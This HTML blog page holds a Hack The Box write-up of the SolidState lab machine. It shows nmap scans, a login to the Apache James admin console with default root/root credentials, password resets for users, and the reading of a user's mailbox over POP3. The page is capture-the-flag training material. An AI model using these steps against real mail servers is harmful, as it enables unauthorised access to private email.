<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta name="generator" content="Hugo 0.34" />
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hack The Box Write-up - SolidState | My homepage</title>
    <meta name="description" content="Write-up for the machine SolidState from Hack The Box. Requires thorough port scanning to find an esoteric telnet admin interface of the Apache James email server. With default root credentials, you become James admin and break into people&#39;s email inboxes. Inside, you find SSH credentials, bypass a restricted shell and finally find an insecure cron job to escalate to root.">
    <meta name="keywords" content="ctf, infosec, hackthebox, write-up">
    
    
    
    
    

  <meta name="author" content="Dominic Breuker">


    <meta property="og:title" content="Hack The Box Write-up - SolidState" />
<meta property="og:description" content="Write-up for the machine SolidState from Hack The Box. Requires thorough port scanning to find an esoteric telnet admin interface of the Apache James email server. With default root credentials, you become James admin and break into people&#39;s email inboxes. Inside, you find SSH credentials, bypass a restricted shell and finally find an insecure cron job to escalate to root." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://dominicbreuker.com/post/htb_solidstate/" />



<meta property="article:published_time" content="2018-01-30T00:00:00&#43;01:00"/>

<meta property="article:modified_time" content="2018-01-30T00:00:00&#43;01:00"/>











    



  <meta property="og:image" content="https://source.unsplash.com/category/technology/2000x1322">


    <meta name="theme-color" content="#000">

    
    
    
    <link rel="canonical" href="https://dominicbreuker.com/post/htb_solidstate/">
    
    
    <link rel="icon" sizes="any" href="data:image/svg+xml,%3Csvg%20viewBox='0%200%2046%2045'%20xmlns='http://www.w3.org/2000/svg'%3E%3Ctitle%3EAfter%20Dark%3C/title%3E%3Cpath%20d='M.708%2045L23%20.416%2045.292%2045H.708zM35%2038L23%2019%2011%2038h24z'%20fill='%23000'/%3E%3C/svg%3E">

    <style>
  html{font-size:12px}*{box-sizing:border-box;text-rendering:geometricPrecision}body{font-size:1rem;line-height:1.5rem;margin:0;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif;word-wrap:break-word}h1,h2,h3,h4,h5,h6{line-height:1.3em}fieldset{border:none;padding:0;margin:0}pre{padding:2rem;margin:1.75rem 0;background-color:#fff;border:1px solid #ccc;overflow:auto}code[class*=language-],pre[class*=language-],pre code{font-weight:100;text-shadow:none;margin:1.75rem 0}a{cursor:pointer;color:#ff2e88;text-decoration:none;border-bottom:1px solid #ff2e88}a:hover{background-color:#ff2e88;color:#fff}.grid{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap}.grid.\-top{-ms-flex-align:start;-ms-grid-row-align:flex-start;align-items:flex-start}.grid.\-middle{-ms-flex-align:center;-ms-grid-row-align:center;align-items:center}.grid.\-bottom{-ms-flex-align:end;-ms-grid-row-align:flex-end;align-items:flex-end}.grid.\-stretch{-ms-flex-align:stretch;-ms-grid-row-align:stretch;align-items:stretch}.grid.\-baseline{-ms-flex-align:baseline;-ms-grid-row-align:baseline;align-items:baseline}.grid.\-left{-ms-flex-pack:start;justify-content:flex-start}.grid.\-center{-ms-flex-pack:center;justify-content:center}.grid.\-right{-ms-flex-pack:end;justify-content:flex-end}.grid.\-between{-ms-flex-pack:justify;justify-content:space-between}.grid.\-around{-ms-flex-pack:distribute;justify-content:space-around}.cell{-ms-flex:1;flex:1;box-sizing:border-box}@media screen and (min-width:768px){.cell.\-1of12{-ms-flex:0 0 8.33333%;flex:0 0 8.33333%}.cell.\-2of12{-ms-flex:0 0 16.66667%;flex:0 0 16.66667%}.cell.\-3of12{-ms-flex:0 0 25%;flex:0 0 25%}.cell.\-4of12{-ms-flex:0 0 33.33333%;flex:0 0 33.33333%}.cell.\-5of12{-ms-flex:0 0 41.66667%;flex:0 0 41.66667%}.cell.\-6of12{-ms-flex:0 0 50%;flex:0 0 50%}.cell.\-7of12{-ms-flex:0 0 58.33333%;flex:0 0 58.33333%}.cell.\-8of12{-ms-flex:0 0 66.66667%;flex:0 0 66.66667%}.cell.\-9of12{-ms-flex:0 0 75%;flex:0 0 75%}.cell.\-10of12{-ms-flex:0 0 83.33333%;flex:0 0 83.33333%}.cell.\-11of12{-ms-flex:0 0 91.66667%;flex:0 0 91.66667%}}@media screen and (max-width:768px){.grid{-ms-flex-direction:column;flex-direction:column}.cell{-ms-flex:0 0 auto;flex:0 0 auto}}.hack,.hack blockquote,.hack code,.hack em,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack strong{font-size:1rem;font-style:normal;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif}.hack blockquote,.hack code,.hack em,.hack strong{line-height:20px}.hack blockquote,.hack code,.hack footer,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack header,.hack li,.hack ol,.hack p,.hack section,.hack ul{float:none;margin:0;padding:0}.hack blockquote,.hack h1,.hack ol,.hack p,.hack ul{margin-top:20px;margin-bottom:20px}.hack h1{position:relative;display:inline-block;display:table-cell;padding:20px 0 30px;margin:0;overflow:hidden}.hack h1:after{content:"====================================================================================================";position:absolute;bottom:10px;left:0}.hack h1+*{margin-top:0}.hack h2,.hack h3,.hack h4,.hack h5,.hack h6{position:relative;margin-bottom:1.75rem}.hack h2:before,.hack h3:before,.hack h4:before,.hack h5:before,.hack h6:before{display:inline}.hack h2:before{content:"## "}.hack h3:before{content:"### "}.hack h4:before{content:"#### "}.hack h5:before{content:"##### "}.hack h6:before{content:"###### "}.hack li{position:relative;display:block;padding-left:20px}.hack li:after{position:absolute;top:0;left:0}.hack ul>li:after{content:"-"}.hack ol{counter-reset:a}.hack ol>li:after{content:counter(a) ".";counter-increment:a}.hack blockquote{position:relative;padding-left:17px;padding-left:2ch;overflow:hidden}.hack blockquote:after{content:">\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>";white-space:pre;position:absolute;top:0;left:0;line-height:20px}.hack em:after,.hack em:before{content:"*";display:inline}.hack pre code:after,.hack pre code:before{content:''}.hack code{font-weight:700}.hack code:after,.hack code:before{content:"`";display:inline}.hack hr{position:relative;height:20px;overflow:hidden;border:0;margin:20px 0}.hack hr:after{content:"----------------------------------------------------------------------------------------------------";position:absolute;top:0;left:0;line-height:20px;width:100%;word-wrap:break-word}@-moz-document url-prefix(){.hack h1{display:block}}.hack-ones ol>li:after{content:"1."}p{margin:0 0 1.75rem}.container{max-width:70rem}.container,.container-fluid{margin:0 auto;padding:0 1rem}.inner{padding:1rem}.inner2x{padding:2rem}.pull-left{float:left}.pull-right{float:right}.progress-bar{height:8px;opacity:.8;background-color:#ccc;margin-top:12px}.progress-bar.progress-bar-show-percent{margin-top:38px}.progress-bar-filled{background-color:gray;height:100%;transition:width .3s ease;position:relative;width:0}.progress-bar-filled:before{content:'';border:6px solid transparent;border-top-color:gray;position:absolute;top:-12px;right:-6px}.progress-bar-filled:after{color:gray;content:attr(data-filled);display:block;font-size:12px;white-space:nowrap;position:absolute;border:6px solid transparent;top:-38px;right:0;-ms-transform:translateX(50%);transform:translateX(50%)}table{width:100%;border-collapse:collapse;margin:1.75rem 0;color:#778087}table td,table th{vertical-align:top;border:1px solid #ccc;line-height:15px;padding:10px}table thead th{font-size:10px}table tbody td:first-child{font-weight:700;color:#333}.form{width:30rem}.form-group{margin-bottom:1.75rem;overflow:auto}.form-group label{border-bottom:2px solid #ccc;color:#333;width:10rem;display:inline-block;height:38px;line-height:38px;padding:0;float:left;position:relative}.form-group.form-success label{color:#4caf50!important;border-color:#4caf50!important}.form-group.form-warning label{color:#ff9800!important;border-color:#ff9800!important}.form-group.form-error label{color:#f44336!important;border-color:#f44336!important}.form-control{outline:none;border:none;border-bottom:2px solid #ccc;padding:.5rem 0;width:20rem;height:38px;background-color:transparent}.form-control:focus{border-color:#555}.form-group.form-textarea label:after{position:absolute;content:'';width:2px;background-color:#fff;right:-2px;top:0;bottom:0}textarea.form-control{height:auto;resize:none;padding:1rem 0;border-bottom:2px solid #ccc;border-left:2px solid #ccc;padding:.5rem}select.form-control{border-radius:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none}.help-block{color:#999;margin-top:.5rem}.form-actions{margin-bottom:1.75rem}.btn{display:-ms-inline-flexbox;display:inline-flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;cursor:pointer;outline:none;padding:.65rem 2rem;font-size:1rem;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;position:relative;z-index:1}.btn:active{box-shadow:inset 0 1px 3px rgba(0,0,0,.12)}.btn.btn-ghost{border-color:#757575;color:#757575;background-color:transparent}.btn.btn-ghost:focus,.btn.btn-ghost:hover{border-color:#424242;color:#424242;z-index:2}.btn.btn-ghost:hover{background-color:transparent}.btn-block{width:100%;display:-ms-flexbox;display:flex}.btn-default{color:#fff;background-color:#e0e0e0;border:1px solid #e0e0e0;color:#333}.btn-default:focus:not(.btn-ghost),.btn-default:hover{background-color:#dcdcdc;border-color:#dcdcdc}.btn-success{color:#fff;background-color:#4caf50;border:1px solid #4caf50}.btn-success:focus:not(.btn-ghost),.btn-success:hover{background-color:#43a047;border-color:#43a047}.btn-success.btn-ghost{border-color:#4caf50;color:#4caf50}.btn-success.btn-ghost:focus,.btn-success.btn-ghost:hover{border-color:#388e3c;color:#388e3c;z-index:2}.btn-error{color:#fff;background-color:#f44336;border:1px solid #f44336}.btn-error:focus:not(.btn-ghost),.btn-error:hover{background-color:#e53935;border-color:#e53935}.btn-error.btn-ghost{border-color:#f44336;color:#f44336}.btn-error.btn-ghost:focus,.btn-error.btn-ghost:hover{border-color:#d32f2f;color:#d32f2f;z-index:2}.btn-warning{color:#fff;background-color:#ff9800;border:1px solid #ff9800}.btn-warning:focus:not(.btn-ghost),.btn-warning:hover{background-color:#fb8c00;border-color:#fb8c00}.btn-warning.btn-ghost{border-color:#ff9800;color:#ff9800}.btn-warning.btn-ghost:focus,.btn-warning.btn-ghost:hover{border-color:#f57c00;color:#f57c00;z-index:2}.btn-info{color:#fff;background-color:#00bcd4;border:1px solid #00bcd4}.btn-info:focus:not(.btn-ghost),.btn-info:hover{background-color:#00acc1;border-color:#00acc1}.btn-info.btn-ghost{border-color:#00bcd4;color:#00bcd4}.btn-info.btn-ghost:focus,.btn-info.btn-ghost:hover{border-color:#0097a7;color:#0097a7;z-index:2}.btn-primary{color:#fff;background-color:#2196f3;border:1px solid #2196f3}.btn-primary:focus:not(.btn-ghost),.btn-primary:hover{background-color:#1e88e5;border-color:#1e88e5}.btn-primary.btn-ghost{border-color:#2196f3;color:#2196f3}.btn-primary.btn-ghost:focus,.btn-primary.btn-ghost:hover{border-color:#1976d2;color:#1976d2;z-index:2}.btn-group{overflow:auto}.btn-group .btn{float:left}.btn-group .btn-ghost:not(:first-child){margin-left:-1px}.card{border:1px solid #ccc}.card .card-header{color:#333;text-align:center;background-color:#ddd;padding:.5rem 0}.alert{color:#ccc;padding:1rem;border:1px solid #ccc;margin-bottom:1.75rem}.alert-success{color:#4caf50;border-color:#4caf50}.alert-error{color:#f44336;border-color:#f44336}.alert-info{color:#00bcd4;border-color:#00bcd4}.alert-warning{color:#ff9800;border-color:#ff9800}.media:not(:last-child){margin-bottom:1.25rem}.media-left{padding-right:1rem}.media-left,.media-right{display:table-cell;vertical-align:top}.media-right{padding-left:1rem}.media-body{display:table-cell;vertical-align:top}.media-heading{font-size:1.16667rem;font-weight:700}.media-content{margin-top:.3rem}.avatarholder,.placeholder{background-color:#f0f0f0;text-align:center;color:#b9b9b9;font-size:1rem;border:1px solid #f0f0f0}.avatarholder{width:48px;height:48px;line-height:46px;font-size:2rem;background-size:cover;background-position:50%;background-repeat:no-repeat}.avatarholder.rounded{border-radius:33px}.loading{display:inline-block;content:'&nbsp;';height:20px;width:20px;margin:0 .5rem;animation:a .6s infinite linear;border:2px solid #e91e63;border-right-color:transparent;border-radius:50%}.btn .loading{margin-bottom:0;width:14px;height:14px}.btn div.loading{float:left}.alert .loading{margin-bottom:-5px}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}.menu{width:100%}.menu .menu-item{display:block;color:#616161;border-color:#616161}.menu .menu-item.active,.menu .menu-item:hover{color:#000;border-color:#000;background-color:transparent}@media screen and (max-width:768px){.form-group label{display:block;border-bottom:none;width:100%}.form-group.form-textarea label:after{display:none}.form-control{width:100%}textarea.form-control{border-left:none;padding:.5rem 0}pre::-webkit-scrollbar{height:3px}}@media screen and (max-width:480px){.form{width:100%}}.dark{color:#ccc}.dark,.dark pre{background-color:#000}.dark pre{padding:0;border:none}.dark pre code{color:#00bcd4}.dark h1 a,.dark h2 a,.dark h3 a,.dark h4 a,.dark h5 a{color:#ccc}.dark code,.dark strong{color:#fff}.dark code{font-weight:100}.dark table{color:#ccc}.dark table td,.dark table th{border-color:#444}.dark table tbody td:first-child{color:#fff}.dark .form-group label{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-group.form-textarea label:after{background-color:#000}.dark .form-control{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-control:focus{border-color:#ccc;color:#ccc}.dark textarea.form-control{color:#ccc}.dark .card{border-color:rgba(95,95,95,.78)}.dark .card .card-header{background-color:transparent;color:#ccc;border-bottom:1px solid rgba(95,95,95,.78)}.dark .btn.btn-ghost.btn-default{border-color:#ababab;color:#ababab}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#9c9c9c;color:#9c9c9c;z-index:1}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#e0e0e0;color:#e0e0e0}.dark .btn.btn-ghost.btn-primary:focus,.dark .btn.btn-ghost.btn-primary:hover{border-color:#64b5f6;color:#64b5f6}.dark .btn.btn-ghost.btn-success:focus,.dark .btn.btn-ghost.btn-success:hover{border-color:#81c784;color:#81c784}.dark .btn.btn-ghost.btn-info:focus,.dark .btn.btn-ghost.btn-info:hover{border-color:#4dd0e1;color:#4dd0e1}.dark .btn.btn-ghost.btn-error:focus,.dark .btn.btn-ghost.btn-error:hover{border-color:#e57373;color:#e57373}.dark .btn.btn-ghost.btn-warning:focus,.dark .btn.btn-ghost.btn-warning:hover{border-color:#ffb74d;color:#ffb74d}.dark .avatarholder,.dark .placeholder{background-color:transparent;border-color:#333}.dark .menu .menu-item{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .menu .menu-item.active,.dark .menu .menu-item:hover{color:#fff;border-color:#ccc}
  :root {
  --screen-size-small: 30em; /* breakpoint reference only */
}
@keyframes intro {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
.muted {
  color: rgba(255, 255, 255, 0.5);
}
.readmore {
  margin-bottom: 2.2em;
}
.responsive-iframe {
  position: relative;
  padding-bottom: 56.25%; /* 16:9 */
  padding-top: 25px;
  height: 0;
}
.responsive-iframe iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
iframe {
  border: 0;
}
main, footer {
  animation: intro 0.3s both;
  animation-delay: 0.15s;
}
footer time[datetime$="M"]:before {
  content: "\2013\0020";
}
@media only screen
  and ( max-width: 30em ) {
  footer time[datetime$="M"] {
    display: none;
  }
}
blockquote cite {
  display: block;
}
blockquote cite::before {
   content: "\2014";
}
:target {
  color: #fff;
}
/* hack.css overrides and enhancements */
.hack li ul {
  margin: 0;
}
.main {
  padding: 20px 10px;
}
nav a.active {
  background-color: #ff2e88;
  color: #fff;
}
a[itemprop="url"] {
  color: #ff9800;
}
a[itemprop="url"]:hover {
  color: #fff;
}
a[href*="://"]::after,
a[rel*="external"] {
  content: " " url("data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20class='i-external'%20viewBox='0%200%2032%2032'%20width='14'%20height='14'%20fill='none'%20stroke='%23ff9800'%20stroke-linecap='round'%20stroke-linejoin='round'%20stroke-width='9.38%'%3E%3Cpath%20d='M14%209%20L3%209%203%2029%2023%2029%2023%2018%20M18%204%20L28%204%2028%2014%20M28%204%20L14%2018'/%3E%3C/svg%3E");
}
figure a[href*="://"]::after,
figure a[rel*="external"] {
  content: "";
}
html {
  font-size: 13px;
}
.hack pre {
  font-size: 17px;
}
article [itemprop="description"] {
  margin-bottom: 20px;
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  html {
    font-size: 1em;
  }
  .container {
    max-width: 50rem;
  }
}

  nav a.active {
  background-color: #33cc33; /*ff2e88*/
  color: #fff;
}
a[itemprop="url"] {
  color: #339933; /*ff9800*/
}
a[itemprop="url"]:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

.dark pre code {
  color: #248f24;
}

.dark code {
  color: #248f24;
}

a {
  color: #339933; /*ff9800*/
  border-bottom: 1px solid #33cc33;
}

a:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

/* custom styles */
figure {
  margin-left: auto;
  margin-right: auto;
  text-align: center;
}
figure img {
  max-width: 100%;
}
figure a {
  border-bottom: none !important;
}
figure a:hover {
  background-color: inherit !important;
}

</style>

    
    
      <script async src="/js/lazysizes.min.js"></script>
    
    
      <script async src="/js/bpgdec8a.js"></script>
      <script async src="/js/bpgdec8.js"></script>
      <script async src="/js/bpgdec.js"></script>
    
  </head>
  
  <body class="hack dark main container">
    <header>
  
  <nav itemscope itemtype="http://schema.org/SiteNavigationElement">
    
    
      <a itemprop="url" class="" href="/"><span itemprop="name">Home</span></a>
    
      <a itemprop="url" class="active" href="/post/"><span itemprop="name">Post</span></a>
    
      <a itemprop="url" class="" href="/about/"><span itemprop="name">About</span></a>
    
  </nav>


</header>
    <main>
  <article itemscope itemtype="http://schema.org/BlogPosting">
    
<meta itemprop="name" content="Hack The Box Write-up - SolidState">
<meta itemprop="description" content="Write-up for the machine SolidState from Hack The Box. Requires thorough port scanning to find an esoteric telnet admin interface of the Apache James email server. With default root credentials, you become James admin and break into people&#39;s email inboxes. Inside, you find SSH credentials, bypass a restricted shell and finally find an insecure cron job to escalate to root.">


<meta itemprop="datePublished" content="2018-01-30T00:00:00&#43;01:00" />
<meta itemprop="dateModified" content="2018-01-30T00:00:00&#43;01:00" />
<meta itemprop="wordCount" content="2504">



<meta itemprop="keywords" content="ctf,infosec,hackthebox,write-up," />

    <script async src="/js/baffle.js"></script>
    <header>
      <h1 class="baffle" itemprop="headline">Hack The Box Write-up - SolidState</h1>
      <p class="muted">
        <svg style="margin-bottom:-3px" class="i-clock" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <circle cx="16" cy="16" r="14" />
  <path d="M16 8 L16 16 20 20" />
</svg>
<span>12 minute read</span>
<svg style="margin-bottom: -3px" class="i-edit" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <path d="M30 7 L25 2 5 22 3 29 10 27 Z M21 6 L26 11 Z M5 22 L10 27 Z" />
</svg>

  Published: <time datetime="2018-01-30T00:00:00&#43;01:00">30 Jan, 2018</time>


      </p>
    </header>
    
      <blockquote itemprop="description">Write-up for the machine SolidState from Hack The Box. Requires thorough port scanning to find an esoteric telnet admin interface of the Apache James email server. With default root credentials, you become James admin and break into people&#39;s email inboxes. Inside, you find SSH credentials, bypass a restricted shell and finally find an insecure cron job to escalate to root.</blockquote>
    
    
  <details>
    <summary>Table of Contents</summary>
    <nav id="TableOfContents">
<ul>
<li><a href="#enumeration">Enumeration</a>
<ul>
<li><a href="#port-scan">Port scan</a></li>
<li><a href="#website">Website</a></li>
<li><a href="#james-email-server">James email server</a></li>
</ul></li>
<li><a href="#exploiting">Exploiting</a>
<ul>
<li><a href="#james-reading-emails">James - reading emails</a></li>
<li><a href="#exploiting-james">Exploiting James</a></li>
</ul></li>
<li><a href="#privesc">Privesc</a></li>
<li><a href="#links">Links</a></li>
</ul>
</nav>
  </details>
  <script>
    const el = document.querySelector('details summary')
    el.onclick = () => {
      (function(l,o,a,d,e,r){e=o.createElement(a),r=o.getElementsByTagName(a)[0];e.async=1;e.src=d;r.parentNode.insertBefore(e,r)})(window,document,'script','/js/smoothscroll.js');
      el.onclick = null
    }
    document.querySelectorAll('#TableOfContents a').forEach(link => {
      link.addEventListener('click', () => {
        document.querySelector(
          link.href.slice(link.href.indexOf('#'))
        ).scrollIntoView({ behavior: 'smooth' })
      })
    })
  </script>


    <div itemprop="articleBody">
      

<p>This is my second writeup for a machine from <a href="https://www.hackthebox.eu/">Hack The Box</a>.
It is again a rather easy one but still lots of fun.
Lots of opportunities to do some oldschool telnet work on email servers.
It starts with port scanning and illustrates the importance of scanning also more unpopular ports.
After finding the email server with default credentials, you must use your administrator power to get code execution.
Once on the box, all you have to do is finding an insecure cron job and you are root.</p>

<p>Again, some statistics for this machine first.
As it is an easy box, many people got the user flag and a considerable part managed the privesc too.</p>












<figure>
  
    
      <img class="lazyload" data-src="/img/1_htb_solidstate/solidstate_owns.jpg"  />
    
  
  
  <figcaption>
    <header><b>Statistics for SolidState - user and system owns</b></header>
    
  </figcaption>
  
</figure>
<style media="screen">
  .blur-up {
    -webkit-filter: blur(5px);
    filter: blur(5px);
    transition: filter 400ms, -webkit-filter 400ms;
  }
  .blur-up.lazyloaded {
    -webkit-filter: blur(0);
    filter: blur(0);
  }
</style>


<h1 id="enumeration">Enumeration</h1>

<h2 id="port-scan">Port scan</h2>

<p>Given the IP, we start with a basic nmap scan:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ nmap -sV -sC -oN base.log <span style="color: #ae81ff">10</span>.10.10.51

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-23 15:45 EST
Nmap scan report for 10.10.10.51
Host is up (0.050s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (EdDSA)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.15.130 [10.10.15.130]),
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div>

<p>We basically find a website, an SSH server and <a href="https://james.apache.org/">Apache James</a>, which is an email solution.
While the current version of James is 3.0 and it is under active development, this box runs 2.3.2 which is very old.
If you would read the docs, you would discover that is offers an admin interface called <a href="http://james.apache.org/server/2.3.2/remotemanager_configuration.html">RemoteManager</a>.
By default, it runs on port 4555, which does not show up in the list above.
A full port scan though reveals this port too:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ nmap -p- -oN full.log <span style="color: #ae81ff">10</span>.10.10.51

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-23 15:46 EST
Nmap scan report for 10.10.10.51
Host is up (0.058s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Nmap done: 1 IP address (1 host up) scanned in 27.61 seconds
</code></pre></div>

<p>Lesson learned: don&rsquo;t just stick with Nmap&rsquo;s default ports every time.
A full scan may show important services.</p>

<h2 id="website">Website</h2>

<p>I typically check out websites first to see what&rsquo;s there.
This one is quite useless though.
It is merely a static page with a single contact form.</p>












<figure>
  
    
      <img class="lazyload" data-src="/img/1_htb_solidstate/solidstate_contact_form.jpg"  />
    
  
  
  <figcaption>
    <header><b>Contact form on SolidState website.</b></header>
    
  </figcaption>
  
</figure>
<style media="screen">
  .blur-up {
    -webkit-filter: blur(5px);
    filter: blur(5px);
    transition: filter 400ms, -webkit-filter 400ms;
  }
  .blur-up.lazyloaded {
    -webkit-filter: blur(0);
    filter: blur(0);
  }
</style>


<p>You could run sqlmap on it but would not find anything.
Let&rsquo;s focus instead to the email server.</p>

<h2 id="james-email-server">James email server</h2>

<p>As an email server, <a href="https://james.apache.org/">James</a> opens up ports 25 and 110 for sending and receving emails.
There is one odd port 119 offereing something called nntpd.
Asking Google about it, you get to a wiki page about the <a href="https://en.wikipedia.org/wiki/Network_News_Transfer_Protocol">Network News Transfer Protocol</a>.
It is a protocol for Usenet news articles.
Finally, we have the telet admin interface on port 4555.</p>

<p>From the Nmap scan above, we know SolidState run&rsquo;s an outdated version of it (2.3.2).
Checking out exploitdb, we find an exploit for exaclty that version
It sounds interesting since it prommises code execution.
You can check out the details of the exploit <a href="https://www.exploit-db.com/exploits/35513/">here</a>.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ searchsploit james
------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                          |  Path
                                                                        | (/usr/share/exploitdb/)
------------------------------------------------------------------------ ----------------------------------
Apache James 2.2 - SMTP Denial of Service                               | exploits/multiple/dos/27915.pl
Apache James Server 2.3.2 - Remote Command Execution                    | exploits/linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow     | exploits/windows/remote/944.c
------------------------------------------------------------------------ ----------------------------------
</code></pre></div>

<p>The exploit starts with connecting to 4555 using <code>root</code> / <code>root</code> as the credentials.
These seem to be the default user.
Cross-checking <a href="https://redthunder.blog/2016/11/25/install-and-configure-the-apache-james-mail-server/">this</a> article about installing James, we find the same credentials too.
Funny side note: the blog is from Nov 2016.
There actually are people who still install this piece of software in the real world.</p>

<p>Let&rsquo;s log in:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ nc <span style="color: #ae81ff">10</span>.10.10.51 <span style="color: #ae81ff">4555</span>
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user&#39;s password
setalias [user] [alias]                 locally forwards all email for &#39;user&#39; to &#39;alias&#39;
showalias [username]                    shows a user&#39;s current email alias
unsetalias [user]                       unsets an alias for &#39;user&#39;
setforwarding [username] [emailaddress] forwards a user&#39;s email to another email address
showforwarding [username]               shows a user&#39;s current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
</code></pre></div>

<p>Looks like we could do some serious administration here.</p>

<h1 id="exploiting">Exploiting</h1>

<p>Now, we could go directly for the exploit mentioned above.
But reading it carefully, you will see it needs someone to login to the system.
Unless the box runs some scripts logging in as a user every few minutes, the exploit won&rsquo;t help us.
Let&rsquo;s try something simpler for now and just read the emails of different users.</p>

<h2 id="james-reading-emails">James - reading emails</h2>

<p>To read the mail, reset all the passwords via the <code>setpassword [username] [password]</code> command in the admin tool.
For example, we can do <code>setpassword john newpasswd</code>, which James confirms with <code>Password for john reset</code>.
Then, we connect to port 110 (POP3), log into each user, and fetch the mails.
For example, this is how to do it for john.
Be sure to use telnet, not nc, which did not retrieve anything after the welcome banner in my case.
For a reference of POP3 protocol commands, chech <a href="http://sunnyoasis.com/services/emailviatelnet.html">this</a> out.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-console" data-lang="console"><span></span>root@kali ~ $ telnet <span style="color: #ae81ff">10</span>.10.10.51 <span style="color: #ae81ff">110</span>
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is &#39;^]&#39;.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS newpassword
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: &lt;mailadmin@localhost&gt;
Message-ID: &lt;9564574.1.1503422198108.JavaMail.root@solidstate&gt;
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for &lt;john@localhost&gt;;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy&#39;s access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
QUIT
+OK Apache James POP3 Server signing off.
